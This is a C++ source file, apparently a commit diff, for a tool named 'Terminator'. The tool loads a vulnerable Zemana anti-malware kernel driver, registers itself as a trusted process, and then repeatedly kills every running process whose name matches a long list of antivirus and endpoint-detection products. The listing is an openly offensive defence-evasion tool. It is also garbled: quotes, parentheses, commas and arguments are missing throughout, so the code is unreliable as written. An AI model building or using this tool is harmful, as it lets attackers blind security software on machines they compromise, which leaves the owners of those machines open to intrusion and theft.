1+ #define _CRT_SECURE_NO_WARNINGS
2+ #include < Windows.h>
3+ #include < iostream>
4+ #include < Windows.h>
5+ #include < tlhelp32.h>
6+
7+ #define IOCTL_REGISTER_PROCESS 0x80002010
8+
9+ #define IOCTL_TERMINATE_PROCESS 0x80002048
10+
11+
12+
13+ const char * const edrlist[] = {
14+ " activeconsole"
15+ " anti malware"
16+ " anti-malware"
17+ " antimalware"
18+ " anti virus"
19+ " anti-virus"
20+ " antivirus"
21+ " appsense"
22+ " authtap"
23+ " avast"
24+ " avecto"
25+ " canary"
26+ " carbonblack"
27+ " carbon black"
28+ " cb.exe"
29+ " ciscoamp"
30+ " cisco amp"
31+ " countercept"
32+ " countertack"
33+ " cramtray"
34+ " crssvc"
35+ " crowdstrike"
36+ " csagent"
37+ " csfalcon"
38+ " csshell"
39+ " cybereason"
40+ " cyclorama"
41+ " cylance"
42+ " cyoptics"
43+ " cyupdate"
44+ " cyvera"
45+ " cyserver"
46+ " cytray"
47+ " darktrace"
48+ " defendpoint"
49+ " defender"
50+ " eectrl"
51+ " elastic"
52+ " endgame"
53+ " f-secure"
54+ " forcepoint"
55+ " fireeye"
56+ " groundling"
57+ " GRRservic"
58+ " inspector"
59+ " ivanti"
60+ " kaspersky"
61+ " lacuna"
62+ " logrhythm"
63+ " malware"
64+ " mandiant"
65+ " mcafee"
66+ " morphisec"
67+ " msascuil"
68+ " msmpeng"
69+ " nissrv"
70+ " omni"
71+ " omniagent"
72+ " osquery"
73+ " Palo Alto Networks"
74+ " pgeposervice"
75+ " pgsystemtray"
76+ " privilegeguard"
77+ " procwall"
78+ " protectorservic"
79+ " qradar"
80+ " redcloak"
81+ " secureworks"
82+ " securityhealthservice"
83+ " semlaunchsv"
84+ " sentinel"
85+ " sepliveupdat"
86+ " sisidsservice"
87+ " sisipsservice"
88+ " sisipsutil"
89+ " smc.exe"
90+ " smcgui"
91+ " snac64"
92+ " sophos"
93+ " splunk"
94+ " srtsp"
95+ " symantec"
96+ " symcorpu"
97+ " symefasi"
98+ " sysinternal"
99+ " sysmon"
100+ " tanium"
101+ " tda.exe"
102+ " tdawork"
103+ " tpython"
104+ " vectra"
105+ " wincollect"
106+ " windowssensor"
107+ " wireshark"
108+ " threat"
109+ " xagt.exe"
110+ " xagtnotif.exe"
111+ };
112+
113+ int edrlist_size = sizeof (edrlist) / sizeof (edrlist[0 ]);
114+
115+
116+
117+ BOOL
118+ LoadDriver (
119+ char * driverPath
120+ )
121+ {
122+ SC_HANDLE hSCM, hService;
123+ const char * serviceName = " Terminator"
124+
125+ // Open a handle to the SCM database
126+ hSCM = OpenSCManager (NULL , NULL , SC_MANAGER_ALL_ACCESS);
127+ if (hSCM == NULL ) {
128+ return (1 );
129+ }
130+
131+ // Check if the service already exists
132+ hService = OpenServiceA (hSCM, serviceName, SERVICE_ALL_ACCESS);
133+ if (hService != NULL )
134+ {
135+ printf (" Service already exists.\n "
136+
137+ // Start the service if it"s not running
138+ SERVICE_STATUS serviceStatus;
139+ if (!QueryServiceStatus (hService, &serviceStatus))
140+ {
141+ CloseServiceHandle (hService);
142+ CloseServiceHandle (hSCM);
143+ return (1 );
144+ }
145+
146+ if (serviceStatus.dwCurrentState == SERVICE_STOPPED)
147+ {
148+ if (!StartServiceA (hService, 0 , nullptr ))
149+ {
150+ CloseServiceHandle (hService);
151+ CloseServiceHandle (hSCM);
152+ return (1 );
153+ }
154+
155+ printf (" Starting service...\n "
156+ }
157+
158+ CloseServiceHandle (hService);
159+ CloseServiceHandle (hSCM);
160+ return (0 );
161+ }
162+
163+ // Create the service
164+ hService = CreateServiceA (
165+ hSCM,
166+ serviceName,
167+ serviceName,
168+ SERVICE_ALL_ACCESS,
169+ SERVICE_KERNEL_DRIVER,
170+ SERVICE_DEMAND_START,
171+ SERVICE_ERROR_IGNORE,
172+ driverPath,
173+ NULL ,
174+ NULL ,
175+ NULL ,
176+ NULL ,
177+ NULL
178+ );
179+
180+ if (hService == NULL ) {
181+ CloseServiceHandle (hSCM);
182+ return (1 );
183+ }
184+
185+ printf (" Service created successfully.\n "
186+
187+ // Start the service
188+ if (!StartServiceA (hService, 0 , nullptr ))
189+ {
190+ CloseServiceHandle (hService);
191+ CloseServiceHandle (hSCM);
192+ return (1 );
193+ }
194+
195+ printf (" Starting service...\n "
196+
197+ CloseServiceHandle (hService);
198+ CloseServiceHandle (hSCM);
199+
200+ return (0 );
201+ }
202+
203+
204+
205+ BOOL
206+ CheckProcess (
207+ DWORD pn)
208+ {
209+ DWORD procId = 0 ;
210+ HANDLE hSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0 );
211+
212+ if (hSnap != INVALID_HANDLE_VALUE)
213+ {
214+ PROCESSENTRY32 pE;
215+ pE.dwSize = sizeof (pE);
216+
217+ if (Process32First (hSnap, &pE))
218+ {
219+ if (!pE.th32ProcessID )
220+ Process32Next (hSnap, &pE);
221+ do
222+ {
223+ if (pE.th32ProcessID == pn)
224+ {
225+ CloseHandle (hSnap);
226+ return (1 );
227+ }
228+ } while (Process32Next (hSnap, &pE));
229+ }
230+ }
231+ CloseHandle (hSnap);
232+ return (0 );
233+ }
234+
235+ char * to_lowercase (const char * str)
236+ {
237+ char * lower_str = _strdup (str);
238+ for (int i = 0 ; lower_str[i]; i++)
239+ {
240+ lower_str[i] = tolower ((unsigned char )lower_str[i]);
241+ }
242+ return lower_str;
243+ }
244+
245+ int is_in_edrlist (const char * pn)
246+ {
247+ char * tempv = to_lowercase (pn);
248+ for (int i = 0 ; i < edrlist_size; i++)
249+ {
250+ if (strstr (tempv, edrlist[i]) != NULL )
251+ {
252+ free (tempv);
253+ return (1 );
254+ }
255+ }
256+ free (tempv);
257+ return (0 );
258+ }
259+
260+ DWORD check_EDR_Processes (HANDLE hDevice) {
261+ unsigned int procId = 0 ;
262+ unsigned int pOutbuff = 0 ;
263+ DWORD bytesRet = 0 ;
264+ int ecount = 0 ;
265+ HANDLE hSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0 );
266+
267+ if (hSnap != INVALID_HANDLE_VALUE)
268+ {
269+ PROCESSENTRY32 pE;
270+ pE.dwSize = sizeof (pE);
271+
272+ if (Process32First (hSnap, &pE))
273+ {
274+ do
275+ {
276+ char exeName[MAX_PATH];
277+ wcstombs (exeName, pE.szExeFile , MAX_PATH);
278+
279+ if (is_in_edrlist (exeName))
280+ {
281+ procId = (unsigned int )pE.th32ProcessID ;
282+ if (!DeviceIoControl (hDevice, IOCTL_TERMINATE_PROCESS, &procId, sizeof (procId), &pOutbuff, sizeof (pOutbuff), &bytesRet, NULL ))
283+ printf (" faild to terminate %ws !!\n " szExeFile );
284+ else
285+ {
286+ printf (" terminated %ws\n " szExeFile );
287+ ecount++;
288+ }
289+ }
290+ } while (Process32Next (hSnap, &pE));
291+ }
292+ CloseHandle (hSnap);
293+ }
294+ return (ecount);
295+ }
296+
297+ int
298+ main (
299+ void
300+ ) {
301+
302+ WIN32_FIND_DATAA fileData;
303+ HANDLE hFind;
304+ char FullDriverPath[MAX_PATH];
305+ BOOL once = 1 ;
306+
307+ hFind = FindFirstFileA (" Terminator.sys"
308+
309+ if (hFind != INVALID_HANDLE_VALUE) { // file is found
310+ if (GetFullPathNameA (fileData.cFileName , MAX_PATH, FullDriverPath, NULL ) != 0 ) { // full path is found
311+ printf (" driver path: %s\n "
312+ }
313+ else {
314+ printf (" path not found !!\n "
315+ return (-1 );
316+ }
317+ }
318+ else {
319+ printf (" driver not found !!\n "
320+ return (-1 );
321+ }
322+ printf (" Loading %s driver .. \n " cFileName );
323+
324+ if (LoadDriver (FullDriverPath))
325+ {
326+ printf (" faild to load driver ,try to run the program as administrator!!\n "
327+ return (-1 );
328+ }
329+
330+ printf (" driver loaded successfully !!\n "
331+
332+ HANDLE hDevice = CreateFile (L" \\\\ .\\ ZemanaAntiMalware" 0 , NULL , OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
333+
334+ if (hDevice == INVALID_HANDLE_VALUE) {
335+ printf (" Failed to open handle to driver !! "
336+ return (-1 );
337+ }
338+
339+ unsigned int input = GetCurrentProcessId ();
340+
341+ if (!DeviceIoControl (hDevice, IOCTL_REGISTER_PROCESS, &input, sizeof (input), NULL , 0 , NULL , NULL ))
342+ {
343+ printf (" Failed to register the process in the trusted list %X !!\n "
344+ return (-1 );
345+ }
346+
347+ printf (" process registed in the trusted list %X !!\n "
348+
349+
350+ printf (" Terminating ALL EDR/XDR/AVs ..\n keep the program running to prevent windows service from restarting them\n "
351+
352+
353+ while (0x1 )
354+ {
355+ if (!check_EDR_Processes (hDevice))
356+ Sleep (1200 );
357+ else
358+ Sleep (700 );
359+ }
360+
361+ system (" pause"
362+
363+ CloseHandle (hDevice);
364+
365+ return 0 ;
366+ }
0 commit comments